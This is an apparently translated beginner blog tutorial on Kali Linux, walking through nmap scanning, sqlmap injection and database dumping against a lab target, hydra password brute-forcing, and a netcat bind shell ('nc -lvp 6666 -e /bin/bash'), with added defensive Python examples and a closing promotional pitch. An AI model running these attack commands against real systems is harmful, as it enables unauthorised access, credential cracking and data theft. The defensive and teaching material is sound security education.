If you are a hacker in the Year of the Dragon, choose Dragon Software [Kali Linux], from beginner to proficient

Table of contents

Preface

1. What is kali linux?

2. Install and download kali

3. Introduction to common tools in kali

1. nmap

2. sqlmap

3. hydra

4. netcat

Summary

Preface

I believe many students have heard of the Kali system while learning about and studying network security; everyone calls it the hackers' favourite system. So what is Kali, and what can a beginner do with it? This article gives a simple introduction.

1. What is kali linux?

Kali Linux is a Linux operating system built specifically for penetration testing, developed from BackTrack. After integrating IWHAX, WHOPPIX and Auditor, three Live Linux distributions dedicated to penetration testing, BackTrack was officially renamed Kali Linux. So yes, Kali is in essence also a Linux system: hackers used to carry their own collections of tools, and over time the community jointly developed an open-source system that bundles the various hacking tools. The main reason hackers like Kali is that it ships with a complete toolset, which saves the trouble of downloading and installing each tool at the moment it is needed.

2. Install and download kali

Kali’s official website address: https://www.kali.org

Kali is still actively updated. The latest variant is Kali Purple, which bundles more tools for the defensive side. Students who have trouble accessing the download or do not know how to set it up can use my Baidu Netdisk link; the system there has been lightly prepared by me (apt source changed, Chinese language set, etc.). Baidu Netdisk: https://pan.baidu.com/s/18hirvdGXWqawrU2EdnJlgA?pwd=8as6

Just download it, unzip it and open it with VMware. The default root account and password are kali / kali. Students who have never used VMware should first look up online how to download it. Novices may also run into the problem that the virtual machine has no network; for them I recommend choosing a bridged (direct) connection when configuring the network adapter, and once you understand the adapter's network segment you can configure the adapter settings yourself. (Virtual Machine in the upper-left corner > Settings > Network Adapter > Bridged mode > Replicate physical network connection state)

3. Introduction to common tools in kali

As mentioned above, Kali integrates a large number of hacking and network-security tools; it can be said that whatever a hacker needs to do, this system has a tool for it. Below I recommend a few small tools that novices can use to get started.

1. nmap

Nmap, nicknamed the Eye of the Gods, is a very powerful network reconnaissance tool that performs host discovery and port scanning. It also ships with vulnerability-scanning scripts that can check the services found on a host's ports for known vulnerabilities.

The most basic usage of nmap:

nmap [target IP]
nmap 192.168.1.10

nmap [target subnet]
nmap 192.168.1.0/24

nmap also provides a large number of parameters that can be set for a scan. Here are some commonly used ones:

-p scan the specified port(s)

-sV detect service/version information

-sT TCP connect scan

-sS TCP SYN scan

-sU UDP scan

-A aggressive scan: enables OS detection of the target (together with version detection, the default scripts and traceroute)

-sC equivalent to --script=default, runs the default script set

Adding parameters changes what the scan reports.

For more detailed usage of nmap, please refer to this link: https://blog.csdn.net/smli_ng/article/details/105964486

2. sqlmap

sqlmap is an automated detection tool for SQL injection vulnerabilities. It supports vulnerability detection across multiple operating-system environments and multiple database products. Penetration testers often joke: "No technique needed, just go all-in with sqlmap; the moment the screen turns green, clock off for the day."

Basic use of sqlmap:

sqlmap -u "www.baidu.com"

Please do not batch-scan public Internet assets without authorization; be careful, or you may end up doing prison labour.

Below I use the sqli-labs target range as an example:

The green text in the screenshot shows that sqlmap has successfully injected the parameter. Note that the parameter id (/?id=) is passed as a GET parameter at the end of my URL; if no parameter is supplied to sqlmap, it has nothing to test and cannot be used.

Once the injection point has been found, the remaining steps are essentially fixed.

sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" --dbs  # list the databases hosted by the current database server
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D <database> --tables  # list all tables in the given database
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D <database> -T <table> --columns  # list all columns of table T in database D
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D <database> -T <table> -C <column> --dump  # dump the contents of that column; the final output lines give the path where it was saved

The first step is to obtain the databases:

The second step is to obtain the table names in the database:

The third step is to obtain the columns of the table (in fact, once you have the table name, you can run --dump directly to fetch the whole table's contents)

So the hard part of using sqlmap is finding the injection point, that is, the parameter that triggers the SQL injection. In the example it is the "id" parameter sent as a GET parameter. Here are some commonly used sqlmap parameters:

-p specifies the parameter to test

-u specifies the target URL. If you do not name a parameter with -p, the URL must carry a GET parameter, i.e. append "?id=1" to it.

-r loads the request from a file. Usually used for injection in POST parameters; the file is a raw HTTP request, which can be captured with Burp Suite or Wireshark.

--dbs enumerate databases

--level= test level (1-5, default 1)

--risk= test risk (0-3, default 1)

--os-shell interactive operating-system shell

For detailed tutorials, please refer to: https://blog.csdn.net/smli_ng/article/details/106026901
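To see why the `?id=1` parameter is what sqlmap needs, it helps to look at the query behind it. The following is an added example, not code from the original post or from sqli-labs: it writes the same `id` lookup twice against an in-memory SQLite table with constructed rows, once with the request parameter spliced into the SQL text (the pattern the lab targets share) and once with a bound placeholder. It also implements the boolean check sqlmap performs, sending a true and a false condition and comparing the responses, to show that the check fires on the first form and stays silent on the second.

```python
"""Vulnerable vs parameterised `id` lookup, and the boolean test sqlmap runs.

Added example (not from the original post or sqli-labs). The users table,
its rows and the function names are constructed for this illustration.
"""
import sqlite3


def make_db():
    """Constructed sample table standing in for the lab's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Lab-style query: the request parameter is concatenated into the SQL text,
    so a quote in the parameter ends the string literal and the rest becomes SQL."""
    sql = "SELECT username FROM users WHERE id='" + user_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, user_id):
    """Parameterised query: the driver sends the value separately from the SQL,
    so quotes in it are just characters to compare against the id column."""
    rows = conn.execute("SELECT username FROM users WHERE id=?", (user_id,))
    return [row[0] for row in rows]


def is_injectable(conn, lookup, user_id="1"):
    """sqlmap-style boolean check: append a condition that is always true, then one
    that is always false; if the two responses differ, the parameter is injectable."""
    true_case = lookup(conn, user_id + "' AND '1'='1")
    false_case = lookup(conn, user_id + "' AND '1'='2")
    return true_case != false_case


if __name__ == "__main__":
    conn = make_db()
    print("normal request      :", lookup_vulnerable(conn, "1"))
    print("tautology, vulnerable:", lookup_vulnerable(conn, "1' OR '1'='1"))
    print("tautology, safe      :", lookup_safe(conn, "1' OR '1'='1"))
    print("sqlmap check, vulnerable:", is_injectable(conn, lookup_vulnerable))
    print("sqlmap check, safe      :", is_injectable(conn, lookup_safe))
```

The parameterised version returns nothing for the tautology because the whole string is compared against the integer column as a single value; that is the fix, not escaping or filtering the input. Two bound parameters are also why `--level` and `--risk` cannot help sqlmap against it: no payload changes the structure of a query whose text the client never controls.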

3. hydra

Hydra, also known as the nine-headed serpent, is a very efficient brute-forcing tool that supports many protocols. To brute-force a given service on a given IP, you supply the dictionary to use, or fix part of the data yourself (for example, cracking the password when the account is already known to be admin).

In kali, hydra can be used in two ways: graphical and command line.

For novices, the graphical interface is simpler and easier to use, so the graphical usage is introduced below.

Then just press Start, and hydra will try every account/password pair in the dictionary as a login attempt.

Of course, this is the simplest way to use hydra; by setting parameters it can be adapted to many situations. Here is a detailed guide to hydra's command line: https://zhuanlan.zhihu.com/p/397779150
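A dictionary attack like the one hydra runs above leaves an unmistakable trace on the target: a burst of failed logins from one source in a short time, often across several usernames. The script below is an added example, not code from the original post or the hydra project: it parses sshd lines in the syslog format used on Debian-based systems such as Kali, counts failures per source within a sliding window, and flags a source that also logged in successfully right after the burst. The log lines are constructed, and the threshold, window and year (syslog timestamps carry no year) are assumptions to tune for your own environment.

```python
"""Detect a hydra-style ssh password attack in sshd log lines.

Added example (not from the original post). SAMPLE_AUTH_LOG is constructed;
threshold, window_seconds and the year are assumptions, not derived values.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: five failures in three seconds from .150 (two usernames),
# then a successful password login from the same source; .42 is normal use.
SAMPLE_AUTH_LOG = """\
Mar 11 10:02:01 kali sshd[2301]: Failed password for invalid user admin from 192.168.0.150 port 51012 ssh2
Mar 11 10:02:02 kali sshd[2303]: Failed password for invalid user admin from 192.168.0.150 port 51014 ssh2
Mar 11 10:02:02 kali sshd[2305]: Failed password for root from 192.168.0.150 port 51016 ssh2
Mar 11 10:02:03 kali sshd[2307]: Failed password for root from 192.168.0.150 port 51018 ssh2
Mar 11 10:02:03 kali sshd[2309]: Failed password for root from 192.168.0.150 port 51020 ssh2
Mar 11 10:02:04 kali sshd[2311]: Accepted password for kali from 192.168.0.150 port 51022 ssh2
Mar 11 10:15:40 kali sshd[2400]: Failed password for kali from 192.168.0.42 port 40110 ssh2
Mar 11 10:20:11 kali sshd[2410]: Accepted publickey for kali from 192.168.0.42 port 40122 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_sshd(log_text, year=2024):
    """Return [(timestamp, source ip, username, failed)] for every login line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a login result line
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Failed"))
    return events


def find_bruteforce(events, threshold=5, window_seconds=60):
    """Return {ip: {failures, users, success_after}} for sources with at least
    `threshold` failures inside any `window_seconds` span."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ts, ip, user, failed in events:
        (failures if failed else successes)[ip].append((ts, user))

    alerts = {}
    for ip, attempts in failures.items():
        attempts.sort()
        # Slide a window of `threshold` consecutive failures over the timeline.
        for i in range(len(attempts) - threshold + 1):
            span = (attempts[i + threshold - 1][0] - attempts[i][0]).total_seconds()
            if span <= window_seconds:
                last_failure = attempts[-1][0]
                alerts[ip] = {
                    "failures": len(attempts),
                    "users": sorted({u for _, u in attempts}),
                    # A success right after the burst means a password was found.
                    "success_after": any(ts > last_failure for ts, _ in successes[ip]),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in find_bruteforce(parse_sshd(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

On a live system feed it `/var/log/auth.log` (or `journalctl -u ssh`); the `success_after` flag is the one to act on first, since it means the dictionary contained a valid password and the account needs rotating, not just the source blocking. Tools such as fail2ban implement the same counting-and-blocking idea as a daemon.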

4. netcat

Netcat, nc for short, is probably the most commonly used network tool. It gives you raw TCP and UDP connections built on sockets, and with nc available you can establish almost any type of connection. In penetration testing it is usually the tool used to obtain a shell on the target IP.

Simple use of nc: establish a connection and transfer data

Host 1: Enable monitoring of port 6666

nc -lvp 6666

Parameter explanation:

-l listen mode

-v verbose output

-p specifies port

Host 2: Connect to port 6666 of host 1

nc 192.168.0.163 6666

Common use of nc: obtaining a shell on the remote host

1. Forward (bind) shell

Host 1:

nc -lvp 6666 -e /bin/bash

Parameter explanation:

-e program redirection

Here, host 1's /bin/bash is attached to port 6666 on host 1 itself, so whoever connects to that port talks to that shell.

Host 2:

nc 192.168.0.163 6666

Think about why the error shown on the left appears. Also, when you run sudo su to try to become root, the password must be entered on the left-hand host before you get in; after that, the password kali typed on the right side is received and an error is reported. Try to understand the differences between the bash, zsh and sh shells.
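Both nc commands above are thin wrappers around one TCP socket: `nc -lvp 6666` binds, listens and accepts, and `nc 192.168.0.163 6666` connects. The script below is an added example, not code from the original post or the netcat project: it reproduces that exchange in plain Python sockets on the loopback interface, with a thread playing host 1 and the main thread playing host 2, so it runs on a single machine. It binds port 0 (any free port) instead of 6666, and the addresses and messages are constructed for the example. It intentionally moves only text; the `-e /bin/bash` form differs solely in wiring the accepted socket to a shell's stdin and stdout.

```python
"""The nc listener/client exchange from the post, written as raw sockets.

Added example (not from the original post). Runs entirely on 127.0.0.1 with
an OS-chosen port; the messages exchanged are constructed for the example.
"""
import socket
import threading


def listener(srv, received):
    """Host 1, i.e. `nc -lvp PORT`: accept one connection, record what arrives, reply."""
    conn, peer = srv.accept()  # -l: block until the other side connects
    with conn:
        data = conn.recv(4096)  # whatever host 2 sends shows up here
        received.append((peer[0], data.decode()))
        conn.sendall(b"message received by host 1\n")


def exchange(message):
    """Run both sides and return (peer ip seen by host 1, text host 1 got, reply host 2 got)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0 = any free port (the post uses -p 6666)
    srv.listen(1)
    port = srv.getsockname()[1]

    received = []
    host1 = threading.Thread(target=listener, args=(srv, received))
    host1.start()

    # Host 2, i.e. `nc 127.0.0.1 <port>`: connect, send a line, read the answer.
    with socket.create_connection(("127.0.0.1", port)) as cli:
        cli.sendall(message.encode())
        reply = cli.recv(4096).decode()

    host1.join()
    srv.close()
    peer_ip, text = received[0]
    return peer_ip, text, reply


if __name__ == "__main__":
    print(exchange("hello from host 2\n"))
```

Note what is absent: no authentication and no encryption. Anyone who can reach the listening port gets the same treatment, which is exactly why the `-e /bin/bash` variant is dangerous if left running, and why a defender should audit listening sockets on a host with `ss -ltnp` and check which program owns each one.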

Summary

If you also want to learn hacking, network security and SQL attack and defence:

Get it here:

This is the latest and most comprehensive network-security learning package, which I spent several days and nights compiling to share with you for free. It contains the following:

1. Learning route & career planning


2. Full set of systematic courses, from beginner to mastery

3. Hacker e-books & interview materials


Source: blog.csdn.net/shangguanliubei/article/details/135322404